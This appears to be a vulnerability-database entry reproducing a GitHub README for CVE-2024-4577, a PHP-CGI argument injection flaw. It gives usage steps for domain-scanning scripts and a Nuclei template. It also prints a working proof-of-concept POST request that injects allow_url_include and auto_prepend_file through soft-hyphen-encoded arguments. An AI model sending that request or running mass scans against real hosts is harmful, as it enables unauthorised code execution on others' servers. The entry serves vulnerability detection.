Vulnerability Details
Basic Information
| Title | Exploit for OS Command Injection in Php |
|---|---|
| Type | githubexploit |
| Published | 2025-04-20T22:33:39 |
| Last Seen | 2025-04-21T06:03:59 |
| CVSS Score | 9.8 (CRITICAL) |
CVSS v3 Details
| Attack Vector | NETWORK |
|---|---|
| Attack Complexity | LOW |
| Privileges Required | NONE |
| User Interaction | NONE |
| Scope | UNCHANGED |
| Confidentiality Impact | HIGH |
| Integrity Impact | HIGH |
| Availability Impact | HIGH |
CVE Information
| CVE IDs | CVE-2024-4577 |
|---|---|
| CWE | |
| Bulletin Family | exploit |
Description
## CVE-2024-4577: Argument Injection in PHP-CGI
## Overview
This repository contains scripts to check for the CVE-2024-4577 vulnerability, an argument injection issue in PHP-CGI. You can use the provided Bash, Go, and Python scripts to test a list of domains for this vulnerability. I’ve also released a Nuclei YAML file.
## Usage
### Bash Script
To use the Bash script, run the following command:
“`bash
./CVE-2024-4577.sh /path/to/domains-list
“`
### Go Script
First, save the Go script to a file named `CVE-2024-4577.go`. To build and run the Go script:
1. Compile the Go script into a binary:
“`bash
go build -o CVE-2024-4577 CVE-2024-4577.go
“`
2. Execute the binary with the domain list file as an argument:
“`bash
./CVE-2024-4577 /path/to/domains-list
“`
### Python Script
First, save the Python script to a file named `CVE-2024-4577.py`. To run the Python script:
1. Ensure you have the `requests` library installed:
“`bash
pip install requests
“`
2. Execute the Python script with the domain list file as an argument:
“`bash
python CVE-2024-4577.py /path/to/domains-list
“`
3. (Optional) If you want to only print vulnerable hosts:
“`bash
python CVE-2024-4577.py /path/to/domains-list –quiet
“`
## Proof of Concept (POC) Explained
To manually test for the vulnerability, you can send the following POST request:
“`http
POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
“`
## Nuclei Template
I’ve also created a Nuclei template to scan for vulnerable instances, it uses the v3 layout scheme and has been tested in a lab environment:
“`
nuclei -t CVE-2024-4577.yaml -u
“`
## Domain List Example
The list of domains should be pre-pended with http/https to ensure they are read correctly.
“`
http://example.com
http://testsite.com
http://vulnerablesite.com
“`
## Example Output
If a domain is found to be vulnerable, the output will be:
“`
http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable
“`
Impact Assessment
| Base Score | 9.8 |
|---|---|
| Severity | CRITICAL |